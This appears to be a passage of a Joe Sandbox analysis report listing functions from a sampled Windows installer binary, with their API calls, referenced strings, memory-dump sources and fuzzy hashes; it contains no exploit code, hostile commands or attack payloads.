                                                                                                                        • Associated: 00000001.00000002.1723358687.0000000000977000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_820000_0x001900000002ab40-59.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _strlen
                                                                                                                        • String ID: ..\..\third_party\libc++\src\include\string_view:267: assertion __s != nullptr failed: null pointer passed to non-null argument of char_traits<...>::length$..\..\third_party\libc++\src\include\vector:1400: assertion __n < size() failed: vector[] index out of bounds$Histogram.MismatchedConstructionArguments
                                                                                                                        • API String ID: 4218353326-961035493
                                                                                                                        • Opcode ID: e7be63c6ed1c65cee8a9e12e5d4e0b0b9600c578d5e5cf4905a780d24ec3c09e
                                                                                                                        • Instruction ID: 200ab792384b0ab9c93f25e725f42f4794a55557a08d756179f0e2423d0a9c77
                                                                                                                        • Opcode Fuzzy Hash: e7be63c6ed1c65cee8a9e12e5d4e0b0b9600c578d5e5cf4905a780d24ec3c09e
                                                                                                                        • Instruction Fuzzy Hash: 192153B5E002199FDB04DF58D885AAEB7B4FF89318B10456EEC059B341E771A906CBE1
                                                                                                                        Function 008B6A20 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 69COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        • ..\..\third_party\libc++\src\include\string_view:313: assertion __len == 0 || __s != nullptr failed: string_view::string_view(_CharT *, size_t): received nullptr, xrefs: 008B6A8C
                                                                                                                        • ..\..\third_party\libc++\src\include\string_view:311: assertion __len <= static_cast<size_type>(numeric_limits<difference_type>::max()) failed: string_view::string_view(_CharT *, size_t): length does not fit in difference_type, xrefs: 008B6A85
                                                                                                                        • ..\..\third_party\libc++\src\include\string_view:267: assertion __s != nullptr failed: null pointer passed to non-null argument of char_traits<...>::length, xrefs: 008B6A93
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1723135992.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1723112428.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723224963.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723256545.0000000000960000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723283258.0000000000961000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000971000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723358687.0000000000977000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_820000_0x001900000002ab40-59.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _strlen
                                                                                                                        • String ID: ..\..\third_party\libc++\src\include\string_view:267: assertion __s != nullptr failed: null pointer passed to non-null argument of char_traits<...>::length$..\..\third_party\libc++\src\include\string_view:311: assertion __len <= static_cast<size_type>(numeric_limits<difference_type>::max()) failed: string_view::string_view(_CharT *, size_t): length does not fit in difference_type$..\..\third_party\libc++\src\include\string_view:313: assertion __len == 0 || __s != nullptr failed: string_view::string_view(_CharT *, size_t): received nullptr
                                                                                                                        • API String ID: 4218353326-4247613780
                                                                                                                        • Opcode ID: cce070adcd02e7f581db23f9e6fbf6eb6b9a1f004e1cfaef15a28e1017c1c537
                                                                                                                        • Instruction ID: 7daf9a3af7bba089416aa0c7cced19e4925395c77f023ecf07d0f1b3543763b8
                                                                                                                        • Opcode Fuzzy Hash: cce070adcd02e7f581db23f9e6fbf6eb6b9a1f004e1cfaef15a28e1017c1c537
                                                                                                                        • Instruction Fuzzy Hash: A101F72274433A6B9F019D689C81EEA7798FA95B583289435FC08E3381F666EC209791
                                                                                                                        Function 0089CAE0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 46libraryloaderCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetModuleHandleW.KERNEL32(ntdll.dll,?,?,?,?,?,?,?,?,?,009659FC), ref: 0089CAF8
                                                                                                                        • GetProcAddress.KERNEL32(00000000,NtQueryInformationProcess), ref: 0089CB04
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1723135992.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1723112428.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723224963.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723256545.0000000000960000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723283258.0000000000961000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000971000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723358687.0000000000977000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_820000_0x001900000002ab40-59.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AddressHandleModuleProc
                                                                                                                        • String ID: NtQueryInformationProcess$ntdll.dll
                                                                                                                        • API String ID: 1646373207-2906145389
                                                                                                                        • Opcode ID: b6ff1d4efc4c16710ecda3965bb231186472a1121d17c01cb49109491e4efd02
                                                                                                                        • Instruction ID: 055f019b8c2482fe8e218f357e1fb7bfbe44732fcbc1dd2af474cd59f3d8cb13
                                                                                                                        • Opcode Fuzzy Hash: b6ff1d4efc4c16710ecda3965bb231186472a1121d17c01cb49109491e4efd02
                                                                                                                        • Instruction Fuzzy Hash: BD01DB31A1032D5BCB10BF769C4996B7BB8EF89769B454355F805A7041EB60994097A0
                                                                                                                        Function 0092A667 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 27libraryCOMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • LoadLibraryExW.KERNEL32(?,00000000,00000800,?,0092A703,00000011,00000001,00000000,?,?,?,0092A5C1,00000002,FlsGetValue,00938284,0093828C), ref: 0092A674
                                                                                                                        • GetLastError.KERNEL32(?,0092A703,00000011,00000001,00000000,?,?,?,0092A5C1,00000002,FlsGetValue,00938284,0093828C,00000011,?,0091C10C), ref: 0092A67E
                                                                                                                        • LoadLibraryExW.KERNEL32(?,00000000,00000000,00000011,?,0091C10C), ref: 0092A6A6
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1723135992.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1723112428.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723224963.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723256545.0000000000960000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723283258.0000000000961000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000971000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723358687.0000000000977000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_820000_0x001900000002ab40-59.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: LibraryLoad$ErrorLast
                                                                                                                        • String ID: api-ms-
                                                                                                                        • API String ID: 3177248105-2084034818
                                                                                                                        • Opcode ID: e5482ce01aa054d71ec27236092a43a178f06346ba00d872dd05f5cf7f25b553
                                                                                                                        • Instruction ID: d23ec70040f4cf64eb4f6263a011078dc8ff0919f06e7bc2a1e15b7114c6ff69
                                                                                                                        • Opcode Fuzzy Hash: e5482ce01aa054d71ec27236092a43a178f06346ba00d872dd05f5cf7f25b553
                                                                                                                        • Instruction Fuzzy Hash: 4AE04831784319BBDF102F92ED06B593E5D9B40B45F144430FD0CA80E5EB62D9509F45
                                                                                                                        Function 008F0870 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 19libraryloaderCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • LoadLibraryW.KERNEL32(bcryptprimitives), ref: 008F0878
                                                                                                                        • GetProcAddress.KERNEL32(00000000,ProcessPrng), ref: 008F0888
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1723135992.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1723112428.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723224963.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723256545.0000000000960000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723283258.0000000000961000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000971000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723358687.0000000000977000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_820000_0x001900000002ab40-59.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AddressLibraryLoadProc
                                                                                                                        • String ID: ProcessPrng$bcryptprimitives
                                                                                                                        • API String ID: 2574300362-1205050517
                                                                                                                        • Opcode ID: 31f2410f5215f080d674b50909dba4fa859298fca8e480b3c40a821736b6d7da
                                                                                                                        • Instruction ID: 068c8ba83ac6d6d1b70d4091fa1e935028b67cc2ef5f870d4cd8e56deee3f8ea
                                                                                                                        • Opcode Fuzzy Hash: 31f2410f5215f080d674b50909dba4fa859298fca8e480b3c40a821736b6d7da
                                                                                                                        • Instruction Fuzzy Hash: DBC0127026C309AB4A147BF7BC0E9397B5CE680B963040471BE0DC2591EB61C0806B64
                                                                                                                        Function 0091C68F Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1723135992.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1723112428.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723224963.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723256545.0000000000960000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723283258.0000000000961000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000971000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723358687.0000000000977000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_820000_0x001900000002ab40-59.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AdjustPointer
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1740715915-0
                                                                                                                        • Opcode ID: 6d18d8a80d86bdb695e35ab7e18308fb3d6d2364dcbfe2a9e6075857e19834c9
                                                                                                                        • Instruction ID: e76010054ffc3fb9f88c9b1d12fec9cc5c4bdb56dec8c3b057e55abf1df12cd3
                                                                                                                        • Opcode Fuzzy Hash: 6d18d8a80d86bdb695e35ab7e18308fb3d6d2364dcbfe2a9e6075857e19834c9
                                                                                                                        • Instruction Fuzzy Hash: 5D51D3B274520A9FEB298F54D841BFAB7A8EF84711F244529E8165B2D0E771EDC0CF90
                                                                                                                        Function 008A0130 Relevance: 6.1, APIs: 4, Instructions: 147COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 008CD950: GetLastError.KERNEL32 ref: 008CDABF
                                                                                                                          • Part of subcall function 008CD950: GetFileAttributesW.KERNEL32(00000003,00000003,?,?,?,00000000), ref: 008CDB41
                                                                                                                          • Part of subcall function 008CD950: FindNextFileW.KERNEL32(?,?,?,?,00000000,00000000), ref: 008CDBB2
                                                                                                                          • Part of subcall function 008CD950: FindClose.KERNEL32(?), ref: 008CDBC6
                                                                                                                        • GetLastError.KERNEL32 ref: 008A01B2
                                                                                                                        • SetFileAttributesW.KERNEL32(?,?,?,?,?,?,?,?,?), ref: 008A02A0
                                                                                                                        • RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 008A02F7
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1723135992.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1723112428.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723224963.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723256545.0000000000960000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723283258.0000000000961000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000971000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723358687.0000000000977000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_820000_0x001900000002ab40-59.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: File$AttributesErrorFindLast$CloseDirectoryNextRemove
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3974083381-0
                                                                                                                        • Opcode ID: 9d6f2521ac65a02a0243fd2f8ab5ad931537f1353afbf63400288f537918f5fe
                                                                                                                        • Instruction ID: e36f235b0534eb580807e3b0f098e761809dcd293949b95acec39bec727de5ee
                                                                                                                        • Opcode Fuzzy Hash: 9d6f2521ac65a02a0243fd2f8ab5ad931537f1353afbf63400288f537918f5fe
                                                                                                                        • Instruction Fuzzy Hash: 5951C971A007265BEF25AB64CC49BBE77B8FF42740F0401A9E51AE7581EB349E44CF91
                                                                                                                        Function 0084A8F0 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 99COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetLastError.KERNEL32(--> Installer > MainWindow::OnCloseWindow,00943D4B,00000000,OnCloseWindow,00000217), ref: 0084A989
                                                                                                                        Strings
                                                                                                                        • --> Installer > MainWindow::OnCloseWindow, xrefs: 0084A968
                                                                                                                        • --> Installer > MainWindow::OnCloseWindow: WaitForInstallAsync timeout, xrefs: 0084A9BE
                                                                                                                        • OnCloseWindow, xrefs: 0084A953, 0084A9A9
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1723135992.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1723112428.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723224963.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723256545.0000000000960000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723283258.0000000000961000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000971000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723358687.0000000000977000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_820000_0x001900000002ab40-59.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorLast
                                                                                                                        • String ID: --> Installer > MainWindow::OnCloseWindow$--> Installer > MainWindow::OnCloseWindow: WaitForInstallAsync timeout$OnCloseWindow
                                                                                                                        • API String ID: 1452528299-3845996101
                                                                                                                        • Opcode ID: 3b0b75e18a392b676a4f4439add517e8146dc3f61657d17c8511c9cce29834a0
                                                                                                                        • Instruction ID: b8c675fd7e7e3f7fac755549aaffcd329cf0c628f51db41c5e4f51f89eb68b89
                                                                                                                        • Opcode Fuzzy Hash: 3b0b75e18a392b676a4f4439add517e8146dc3f61657d17c8511c9cce29834a0
                                                                                                                        • Instruction Fuzzy Hash: 1431D2717483046BDA04AB749C56B6EB769FFC0B08F00881CF546D72D2CBA1A9009AA2
                                                                                                                        Function 008C6EC0 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 78COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetLastError.KERNEL32 ref: 008C6F1F
                                                                                                                        • GetLastError.KERNEL32(Failed to initialize crypt context, error: ,00952ED6,00000001,Initialize,0000002B,?), ref: 008C6F57
                                                                                                                        Strings
                                                                                                                        • Failed to initialize crypt context, error: , xrefs: 008C6F4D
                                                                                                                        • Initialize, xrefs: 008C6F36
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1723135992.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1723112428.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723224963.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723256545.0000000000960000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723283258.0000000000961000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000971000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723358687.0000000000977000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_820000_0x001900000002ab40-59.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorLast
                                                                                                                        • String ID: Failed to initialize crypt context, error: $Initialize
                                                                                                                        • API String ID: 1452528299-567339006
                                                                                                                        • Opcode ID: 9c1b8e2db9e71eeda3a763a281f923744fd1aae9b6001af13d78bd9270d10628
                                                                                                                        • Instruction ID: 3d294d67b012ecdaa58a6adf54e5a09962b798964c30b4d88284dd15f013031e
                                                                                                                        • Opcode Fuzzy Hash: 9c1b8e2db9e71eeda3a763a281f923744fd1aae9b6001af13d78bd9270d10628
                                                                                                                        • Instruction Fuzzy Hash: EF21F472A08341ABD710AB74EC42A6F77A4FFC5714F04493DF995C6292EB70E91887A3
                                                                                                                        Function 00924606 Relevance: 6.1, APIs: 4, Instructions: 74COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetEnvironmentStringsW.KERNEL32 ref: 0092460E
                                                                                                                          • Part of subcall function 0092450A: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,0091DE8B,?,00000000,-00000008), ref: 0092456B
                                                                                                                        • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00924646
                                                                                                                        • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00924666
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1723135992.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1723112428.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723224963.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723256545.0000000000960000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723283258.0000000000961000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000971000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723358687.0000000000977000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_820000_0x001900000002ab40-59.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: EnvironmentStrings$Free$ByteCharMultiWide
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 158306478-0
                                                                                                                        • Opcode ID: 46bf1f35e41335295e380a121980149eb98e7d95321e7931e98b5ee65896b779
                                                                                                                        • Instruction ID: 6f34e9804a5874515710ae982e21f5a2ce06b887458d1ccd38cb249ad9aad965
                                                                                                                        • Opcode Fuzzy Hash: 46bf1f35e41335295e380a121980149eb98e7d95321e7931e98b5ee65896b779
                                                                                                                        • Instruction Fuzzy Hash: B31126F15016397F67112B76BC8EDBF7A5DEE863947140424F602D1108EB74CD0056F5
                                                                                                                        Function 0089C6C0 Relevance: 6.0, APIs: 4, Instructions: 46COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • OpenProcess.KERNEL32(00100451,00000000,?,008B8551,?,?), ref: 0089C6D4
                                                                                                                        • GetLastError.KERNEL32 ref: 0089C6E2
                                                                                                                        • SetLastError.KERNEL32(00000000), ref: 0089C6F7
                                                                                                                        • GetCurrentProcess.KERNEL32 ref: 0089C701
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1723135992.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1723112428.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723224963.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723256545.0000000000960000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723283258.0000000000961000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000971000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723358687.0000000000977000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_820000_0x001900000002ab40-59.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorLastProcess$CurrentOpen
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 4145867261-0
                                                                                                                        • Opcode ID: bac0be39769ac007d57a918f083a99c6fca6511ca8a8092adc072717cf3945d5
                                                                                                                        • Instruction ID: 1d3de1962a73ad8ddbf1b87db80ee369a12b379570b2960067e055848cb966f7
                                                                                                                        • Opcode Fuzzy Hash: bac0be39769ac007d57a918f083a99c6fca6511ca8a8092adc072717cf3945d5
                                                                                                                        • Instruction Fuzzy Hash: 65F0E271204304AFDB002FBD9C8861A7B98EB48366B080528FA48C7291D7719C019B60
                                                                                                                        Function 0092C09A Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • WriteConsoleW.KERNEL32(00000000,?,?,00000000,00000000,?,00926884,00000000,00000001,?,?,?,00917B59,?,00000000,00000000), ref: 0092C0B1
                                                                                                                        • GetLastError.KERNEL32(?,00926884,00000000,00000001,?,?,?,00917B59,?,00000000,00000000,?,?,?,0091749F,?), ref: 0092C0BD
                                                                                                                          • Part of subcall function 0092C110: CloseHandle.KERNEL32(FFFFFFFE,0092C0CD,?,00926884,00000000,00000001,?,?,?,00917B59,?,00000000,00000000,?,?), ref: 0092C120
                                                                                                                        • ___initconout.LIBCMT ref: 0092C0CD
                                                                                                                          • Part of subcall function 0092C0EF: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,0092C08B,00926871,?,?,00917B59,?,00000000,00000000,?), ref: 0092C102
                                                                                                                        • WriteConsoleW.KERNEL32(00000000,?,?,00000000,?,00926884,00000000,00000001,?,?,?,00917B59,?,00000000,00000000,?), ref: 0092C0E2
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1723135992.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1723112428.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723224963.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723256545.0000000000960000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723283258.0000000000961000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000971000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723358687.0000000000977000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_820000_0x001900000002ab40-59.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2744216297-0
                                                                                                                        • Opcode ID: 8cc0f4154e9d1b258cffd903b7a11ed5ca0349259107db54dff66bd1d9461c3e
                                                                                                                        • Instruction ID: 5b06a68eefb8dcce5135ec28c198f107dde6b2efd2af000b8841d2945432f9f0
                                                                                                                        • Opcode Fuzzy Hash: 8cc0f4154e9d1b258cffd903b7a11ed5ca0349259107db54dff66bd1d9461c3e
                                                                                                                        • Instruction Fuzzy Hash: E0F03076498224FBCF222FD2FC09E9E3F66FB493A1F008411FE0995131C7328821AB91
                                                                                                                        Function 05956984 Relevance: 5.7, APIs: 1, Strings: 2, Instructions: 442COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • __EH_prolog3_GS.LIBCMT ref: 0595698E
                                                                                                                          • Part of subcall function 0594CD2C: __EH_prolog3.LIBCMT ref: 0594CD33
                                                                                                                          • Part of subcall function 0594CF92: __EH_prolog3.LIBCMT ref: 0594CF99
                                                                                                                          • Part of subcall function 0594C9C3: __EH_prolog3_GS.LIBCMT ref: 0594C9CA
                                                                                                                          • Part of subcall function 0595670B: __EH_prolog3_GS.LIBCMT ref: 05956715
                                                                                                                          • Part of subcall function 05958264: __EH_prolog3_GS.LIBCMT ref: 0595826B
                                                                                                                          • Part of subcall function 0595612E: __EH_prolog3_GS.LIBCMT ref: 05956138
                                                                                                                          • Part of subcall function 05952D29: __EH_prolog3.LIBCMT ref: 05952D30
                                                                                                                          • Part of subcall function 0595663A: __EH_prolog3_GS.LIBCMT ref: 05956641
                                                                                                                          • Part of subcall function 05958211: __EH_prolog3.LIBCMT ref: 05958218
                                                                                                                          • Part of subcall function 0595690F: __EH_prolog3_GS.LIBCMT ref: 05956916
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1724191152.0000000005940000.00000040.00001000.00020000.00000000.sdmp, Offset: 05940000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_5940000_0x001900000002ab40-59.jbxd
                                                                                                                        Yara matches
